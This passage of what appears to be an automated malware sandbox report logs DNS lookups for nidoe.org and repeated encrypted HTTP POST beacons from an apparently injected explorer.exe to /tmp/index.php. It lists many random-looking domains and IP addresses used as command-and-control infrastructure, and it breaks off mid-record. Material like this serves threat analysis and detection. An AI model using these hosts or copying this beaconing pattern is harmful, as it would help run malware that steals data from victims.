                  Apr 26, 2024 11:49:55.923408031 CEST1.1.1.1192.168.2.50x7207No error (0)nidoe.org190.28.78.114A (IP address)IN (0x0001)false
                  Apr 26, 2024 11:49:55.923408031 CEST1.1.1.1192.168.2.50x7207No error (0)nidoe.org93.118.137.82A (IP address)IN (0x0001)false
                  Apr 26, 2024 11:49:55.923408031 CEST1.1.1.1192.168.2.50x7207No error (0)nidoe.org210.182.29.70A (IP address)IN (0x0001)false
                  Apr 26, 2024 11:49:55.923408031 CEST1.1.1.1192.168.2.50x7207No error (0)nidoe.org220.125.3.190A (IP address)IN (0x0001)false
                  Apr 26, 2024 11:49:55.923408031 CEST1.1.1.1192.168.2.50x7207No error (0)nidoe.org190.147.2.86A (IP address)IN (0x0001)false
                  Apr 26, 2024 11:49:55.923408031 CEST1.1.1.1192.168.2.50x7207No error (0)nidoe.org109.175.29.39A (IP address)IN (0x0001)false
                  Apr 26, 2024 11:49:55.923408031 CEST1.1.1.1192.168.2.50x7207No error (0)nidoe.org201.103.73.225A (IP address)IN (0x0001)false
                  Apr 26, 2024 11:49:55.923408031 CEST1.1.1.1192.168.2.50x7207No error (0)nidoe.org201.191.99.134A (IP address)IN (0x0001)false
                  Apr 26, 2024 11:49:55.923434019 CEST1.1.1.1192.168.2.50x7207No error (0)nidoe.org190.187.52.42A (IP address)IN (0x0001)false
                  Apr 26, 2024 11:49:55.923434019 CEST1.1.1.1192.168.2.50x7207No error (0)nidoe.org201.119.37.26A (IP address)IN (0x0001)false
                  Apr 26, 2024 11:49:55.923434019 CEST1.1.1.1192.168.2.50x7207No error (0)nidoe.org190.28.78.114A (IP address)IN (0x0001)false
                  Apr 26, 2024 11:49:55.923434019 CEST1.1.1.1192.168.2.50x7207No error (0)nidoe.org93.118.137.82A (IP address)IN (0x0001)false
                  Apr 26, 2024 11:49:55.923434019 CEST1.1.1.1192.168.2.50x7207No error (0)nidoe.org210.182.29.70A (IP address)IN (0x0001)false
                  Apr 26, 2024 11:49:55.923434019 CEST1.1.1.1192.168.2.50x7207No error (0)nidoe.org220.125.3.190A (IP address)IN (0x0001)false
                  Apr 26, 2024 11:49:55.923434019 CEST1.1.1.1192.168.2.50x7207No error (0)nidoe.org190.147.2.86A (IP address)IN (0x0001)false
                  Apr 26, 2024 11:49:55.923434019 CEST1.1.1.1192.168.2.50x7207No error (0)nidoe.org109.175.29.39A (IP address)IN (0x0001)false
                  Apr 26, 2024 11:49:55.923434019 CEST1.1.1.1192.168.2.50x7207No error (0)nidoe.org201.103.73.225A (IP address)IN (0x0001)false
                  Apr 26, 2024 11:49:55.923434019 CEST1.1.1.1192.168.2.50x7207No error (0)nidoe.org201.191.99.134A (IP address)IN (0x0001)false
                  Apr 26, 2024 11:49:55.923450947 CEST1.1.1.1192.168.2.50x7207No error (0)nidoe.org190.187.52.42A (IP address)IN (0x0001)false
                  Apr 26, 2024 11:49:55.923450947 CEST1.1.1.1192.168.2.50x7207No error (0)nidoe.org201.119.37.26A (IP address)IN (0x0001)false
                  Apr 26, 2024 11:49:55.923450947 CEST1.1.1.1192.168.2.50x7207No error (0)nidoe.org190.28.78.114A (IP address)IN (0x0001)false
                  Apr 26, 2024 11:49:55.923450947 CEST1.1.1.1192.168.2.50x7207No error (0)nidoe.org93.118.137.82A (IP address)IN (0x0001)false
                  Apr 26, 2024 11:49:55.923450947 CEST1.1.1.1192.168.2.50x7207No error (0)nidoe.org210.182.29.70A (IP address)IN (0x0001)false
                  Apr 26, 2024 11:49:55.923450947 CEST1.1.1.1192.168.2.50x7207No error (0)nidoe.org220.125.3.190A (IP address)IN (0x0001)false
                  Apr 26, 2024 11:49:55.923450947 CEST1.1.1.1192.168.2.50x7207No error (0)nidoe.org190.147.2.86A (IP address)IN (0x0001)false
                  Apr 26, 2024 11:49:55.923450947 CEST1.1.1.1192.168.2.50x7207No error (0)nidoe.org109.175.29.39A (IP address)IN (0x0001)false
                  Apr 26, 2024 11:49:55.923450947 CEST1.1.1.1192.168.2.50x7207No error (0)nidoe.org201.103.73.225A (IP address)IN (0x0001)false
                  Apr 26, 2024 11:49:55.923450947 CEST1.1.1.1192.168.2.50x7207No error (0)nidoe.org201.191.99.134A (IP address)IN (0x0001)false
                  • tkexntmwarsh.net
                    • nidoe.org
                  • bxepraawugwqn.com
                  • tjprilinnlddmg.net
                  • dlytdgdqkjwsthka.net
                  • dlhsbtjkcsrywy.com
                  • guijonadpodebyqi.net
                  • uhlohybvnslbwb.com
                  • dnxsraqaaam.org
                  • jritymeowitfd.org
                  • ylocvbbjhcotul.net
                  • lyvgfxwmddcnfb.org
                  • qipuwsetjdsly.net
                  • sitrlilwixmijdwa.com
                  • lkfxkpohfrqcuf.org
                  • ymaqoerhmbiko.org
                  • lifcehnnpyaunk.com
                  • bmvswhlxjuxjpf.com
                  • chqvujyrjfo.com
                  • jldhvcofgpoohdqq.com
                  • dpmkxcqjquv.org
                  • vxtsdxtdlktwbdnl.org
                  • abowpkrstiub.net
                  • tboygovgxqdbv.org
                  • ovkuafudign.com
                  • xbqpttmfpoa.net
                  • rskpmxlavjxbjtbs.com
                  • hphdpqnonfmpdqxq.net
                  • qakjjulmdxb.org
                  • jljckibghorwl.org
                  • ypaypqoyqmujr.com
                  • xqmcfngarfr.org
                  • crqwqadvlmh.net
                  • ibixnemdysifgd.net
                  • owewxdswvpurak.org
                  • oykcjyefevftfd.com
                  • ybjmbdiflbije.org
                  • uwbpryoiwnr.org
                  • oycdwmonhjrtmcya.com
                  • iscsxhjipsydnvm.org
                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  0192.168.2.549711119.204.11.2801028C:\Windows\explorer.exe
                  TimestampBytes transferredDirectionData
                  Apr 26, 2024 11:47:20.949841022 CEST279OUTPOST /tmp/index.php HTTP/1.1
                  Connection: Keep-Alive
                  Content-Type: application/x-www-form-urlencoded
                  Accept: */*
                  Referer: http://tkexntmwarsh.net/
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                  Content-Length: 255
                  Host: nidoe.org
                  Apr 26, 2024 11:47:20.949866056 CEST255OUTData Raw: 3b 6e 56 18 8d cf 68 24 d7 ac b0 0b 70 00 7b ce 77 7d c0 e7 1a 75 90 66 0c 7e 0e 94 45 b3 c1 18 93 2a c2 20 75 1d 51 6b ee 9b 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 4f 45 c0 f0
                  Data Ascii: ;nVh$p{w}uf~E* uQk?#1|J7 M@NA .[k,vuOENG_bIO9nmBY!IjC~}!&b8`iS~%DebifzFiBx(O8=HTkG0@
                  Apr 26, 2024 11:47:22.135804892 CEST177INHTTP/1.1 404 Not Found
                  Server: nginx/1.24.0
                  Date: Fri, 26 Apr 2024 09:47:21 GMT
                  Content-Type: text/html; charset=utf-8
                  Connection: close
                  X-Powered-By: PHP/7.4.33
                  Data Raw: 03 00 00 00 72 e8 8d
                  Data Ascii: r


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  1192.168.2.549712119.204.11.2801028C:\Windows\explorer.exe
                  TimestampBytes transferredDirectionData
                  Apr 26, 2024 11:47:22.464463949 CEST280OUTPOST /tmp/index.php HTTP/1.1
                  Connection: Keep-Alive
                  Content-Type: application/x-www-form-urlencoded
                  Accept: */*
                  Referer: http://bxepraawugwqn.com/
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                  Content-Length: 365
                  Host: nidoe.org
                  Apr 26, 2024 11:47:22.464495897 CEST365OUTData Raw: 3b 6e 56 18 8d cf 68 24 d7 ac b0 0b 70 00 7b ce 77 7d c0 e7 1a 75 90 66 0c 7e 0e 94 45 b3 c1 18 93 2a c2 20 75 1d 51 6b ee 9b 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 0a 6b 2c 90 f5 76 0b 75 33 15 d0 85
                  Data Ascii: ;nVh$p{w}uf~E* uQk?#1|J7 M@NA -[k,vu3yK]E3%Se(7X3(v{$<)L:?i5[UMq(j.THqui~t\c3JybW"
                  Apr 26, 2024 11:47:23.658689976 CEST510INHTTP/1.1 404 Not Found
                  Server: nginx/1.24.0
                  Date: Fri, 26 Apr 2024 09:47:23 GMT
                  Content-Type: text/html; charset=utf-8
                  Connection: close
                  X-Powered-By: PHP/7.4.33
                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  2192.168.2.549713119.204.11.2801028C:\Windows\explorer.exe
                  TimestampBytes transferredDirectionData
                  Apr 26, 2024 11:47:23.987965107 CEST281OUTPOST /tmp/index.php HTTP/1.1
                  Connection: Keep-Alive
                  Content-Type: application/x-www-form-urlencoded
                  Accept: */*
                  Referer: http://tjprilinnlddmg.net/
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                  Content-Length: 157
                  Host: nidoe.org
                  Apr 26, 2024 11:47:23.987986088 CEST157OUTData Raw: 3b 6e 56 18 8d cf 68 24 d7 ac b0 0b 70 00 7b ce 77 7d c0 e7 1a 75 90 66 0c 7e 0e 94 45 b3 c1 18 93 2a c2 20 75 1d 51 6b ee 9b 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 0b 6b 2c 90 f5 76 0b 75 25 58 ec fb
                  Data Ascii: ;nVh$p{w}uf~E* uQk?#1|J7 M@NA -[k,vu%X{*Qa^NRsO=)o|BsPA#NG&8NYnCyUC
                  Apr 26, 2024 11:47:25.165426970 CEST510INHTTP/1.1 404 Not Found
                  Server: nginx/1.24.0
                  Date: Fri, 26 Apr 2024 09:47:24 GMT
                  Content-Type: text/html; charset=utf-8
                  Connection: close
                  X-Powered-By: PHP/7.4.33
                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  3192.168.2.549714119.204.11.2801028C:\Windows\explorer.exe
                  TimestampBytes transferredDirectionData
                  Apr 26, 2024 11:47:25.556178093 CEST283OUTPOST /tmp/index.php HTTP/1.1
                  Connection: Keep-Alive
                  Content-Type: application/x-www-form-urlencoded
                  Accept: */*
                  Referer: http://dlytdgdqkjwsthka.net/
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                  Content-Length: 148
                  Host: nidoe.org
                  Apr 26, 2024 11:47:25.557106018 CEST148OUTData Raw: 3b 6e 56 18 8d cf 68 24 d7 ac b0 0b 70 00 7b ce 77 7d c0 e7 1a 75 90 66 0c 7e 0e 94 45 b3 c1 18 93 2a c2 20 75 1d 51 6b ee 9b 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 08 6b 2c 90 f5 76 0b 75 50 00 ad a0
                  Data Ascii: ;nVh$p{w}uf~E* uQk?#1|J7 M@NA -[k,vuPTAIq>jlMz!hKx~[34=3Gmt*h
                  Apr 26, 2024 11:47:26.740653992 CEST510INHTTP/1.1 404 Not Found
                  Server: nginx/1.24.0
                  Date: Fri, 26 Apr 2024 09:47:26 GMT
                  Content-Type: text/html; charset=utf-8
                  Connection: close
                  X-Powered-By: PHP/7.4.33
                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  4192.168.2.549715119.204.11.2801028C:\Windows\explorer.exe
                  TimestampBytes transferredDirectionData
                  Apr 26, 2024 11:47:27.784658909 CEST281OUTPOST /tmp/index.php HTTP/1.1
                  Connection: Keep-Alive
                  Content-Type: application/x-www-form-urlencoded
                  Accept: */*
                  Referer: http://dlhsbtjkcsrywy.com/
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                  Content-Length: 287
                  Host: nidoe.org
                  Apr 26, 2024 11:47:27.784682989 CEST287OUTData Raw: 3b 6e 56 18 8d cf 68 24 d7 ac b0 0b 70 00 7b ce 77 7d c0 e7 1a 75 90 66 0c 7e 0e 94 45 b3 c1 18 93 2a c2 20 75 1d 51 6b ee 9b 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 09 6b 2c 90 f5 76 0b 75 23 09 d6 e2
                  Data Ascii: ;nVh$p{w}uf~E* uQk?#1|J7 M@NA -[k,vu#HRFlLae3Je{agu\'y/MV%d5[=w)5TD=B}.yA/j7Fxk6-}_"&
                  Apr 26, 2024 11:47:28.977370024 CEST510INHTTP/1.1 404 Not Found
                  Server: nginx/1.24.0
                  Date: Fri, 26 Apr 2024 09:47:28 GMT
                  Content-Type: text/html; charset=utf-8
                  Connection: close
                  X-Powered-By: PHP/7.4.33
                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  5192.168.2.549716119.204.11.2801028C:\Windows\explorer.exe
                  TimestampBytes transferredDirectionData
                  Apr 26, 2024 11:47:29.304265022 CEST283OUTPOST /tmp/index.php HTTP/1.1
                  Connection: Keep-Alive
                  Content-Type: application/x-www-form-urlencoded
                  Accept: */*
                  Referer: http://guijonadpodebyqi.net/
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                  Content-Length: 343
                  Host: nidoe.org
                  Apr 26, 2024 11:47:29.304290056 CEST343OUTData Raw: 3b 6e 56 18 8d cf 68 24 d7 ac b0 0b 70 00 7b ce 77 7d c0 e7 1a 75 90 66 0c 7e 0e 94 45 b3 c1 18 93 2a c2 20 75 1d 51 6b ee 9b 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 0e 6b 2c 90 f5 76 0b 75 2e 0b dd f2
                  Data Ascii: ;nVh$p{w}uf~E* uQk?#1|J7 M@NA -[k,vu.[VO$ge(`R}3;IoPVLvW,1iB-4jDs-v-XsXs?-kbyO6m6J0-
                  Apr 26, 2024 11:47:30.499388933 CEST163INHTTP/1.1 200 OK
                  Server: nginx/1.24.0
                  Date: Fri, 26 Apr 2024 09:47:30 GMT
                  Content-Type: text/html; charset=utf-8
                  Connection: close
                  X-Powered-By: PHP/7.4.33


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  6192.168.2.549717119.204.11.2801028C:\Windows\explorer.exe
                  TimestampBytes transferredDirectionData
                  Apr 26, 2024 11:47:30.826078892 CEST281OUTPOST /tmp/index.php HTTP/1.1
                  Connection: Keep-Alive
                  Content-Type: application/x-www-form-urlencoded
                  Accept: */*
                  Referer: http://uhlohybvnslbwb.com/
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                  Content-Length: 159
                  Host: nidoe.org
                  Apr 26, 2024 11:47:30.826106071 CEST159OUTData Raw: 3b 6e 56 18 8d cf 68 24 d7 ac b0 0b 70 00 7b ce 77 7d c0 e7 1a 75 90 66 0c 7e 0e 94 45 b3 c1 18 93 2a c2 20 75 1d 51 6b ee 9b 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 0f 6b 2c 90 f5 76 0b 75 3e 23 ce a2
                  Data Ascii: ;nVh$p{w}uf~E* uQk?#1|J7 M@NA -[k,vu>#ERQz!%0 O8A{7H?Z>:UT2:
                  Apr 26, 2024 11:47:32.017399073 CEST163INHTTP/1.1 200 OK
                  Server: nginx/1.24.0
                  Date: Fri, 26 Apr 2024 09:47:31 GMT
                  Content-Type: text/html; charset=utf-8
                  Connection: close
                  X-Powered-By: PHP/7.4.33


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  7192.168.2.549718119.204.11.2801028C:\Windows\explorer.exe
                  TimestampBytes transferredDirectionData
                  Apr 26, 2024 11:47:32.343784094 CEST278OUTPOST /tmp/index.php HTTP/1.1
                  Connection: Keep-Alive
                  Content-Type: application/x-www-form-urlencoded
                  Accept: */*
                  Referer: http://dnxsraqaaam.org/
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                  Content-Length: 277
                  Host: nidoe.org
                  Apr 26, 2024 11:47:32.343822002 CEST277OUTData Raw: 3b 6e 56 18 8d cf 68 24 d7 ac b0 0b 70 00 7b ce 77 7d c0 e7 1a 75 90 66 0c 7e 0e 94 45 b3 c1 18 93 2a c2 20 75 1d 51 6b ee 9b 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 0c 6b 2c 90 f5 76 0b 75 2e 5c bc 9f
                  Data Ascii: ;nVh$p{w}uf~E* uQk?#1|J7 M@NA -[k,vu.\>UAty%{4pv+eE^8B&7XG@`{)sqcZ_FO[1CEF%UskGft+z"E^=,0`
                  Apr 26, 2024 11:47:33.586575985 CEST510INHTTP/1.1 404 Not Found
                  Server: nginx/1.24.0
                  Date: Fri, 26 Apr 2024 09:47:33 GMT
                  Content-Type: text/html; charset=utf-8
                  Connection: close
                  X-Powered-By: PHP/7.4.33
                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  8192.168.2.549719119.204.11.2801028C:\Windows\explorer.exe
                  TimestampBytes transferredDirectionData
                  Apr 26, 2024 11:47:33.917741060 CEST280OUTPOST /tmp/index.php HTTP/1.1
                  Connection: Keep-Alive
                  Content-Type: application/x-www-form-urlencoded
                  Accept: */*
                  Referer: http://jritymeowitfd.org/
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                  Content-Length: 126
                  Host: nidoe.org
                  Apr 26, 2024 11:47:33.917766094 CEST126OUTData Raw: 3b 6e 56 18 8d cf 68 24 d7 ac b0 0b 70 00 7b ce 77 7d c0 e7 1a 75 90 66 0c 7e 0e 94 45 b3 c1 18 93 2a c2 20 75 1d 51 6b ee 9b 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 0d 6b 2c 90 f5 76 0b 75 55 07 bc a0
                  Data Ascii: ;nVh$p{w}uf~E* uQk?#1|J7 M@NA -[k,vuUaGO`EQB+S9
                  Apr 26, 2024 11:47:34.821923971 CEST510INHTTP/1.1 404 Not Found
                  Server: nginx/1.24.0
                  Date: Fri, 26 Apr 2024 09:47:34 GMT
                  Content-Type: text/html; charset=utf-8
                  Connection: close
                  X-Powered-By: PHP/7.4.33
                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 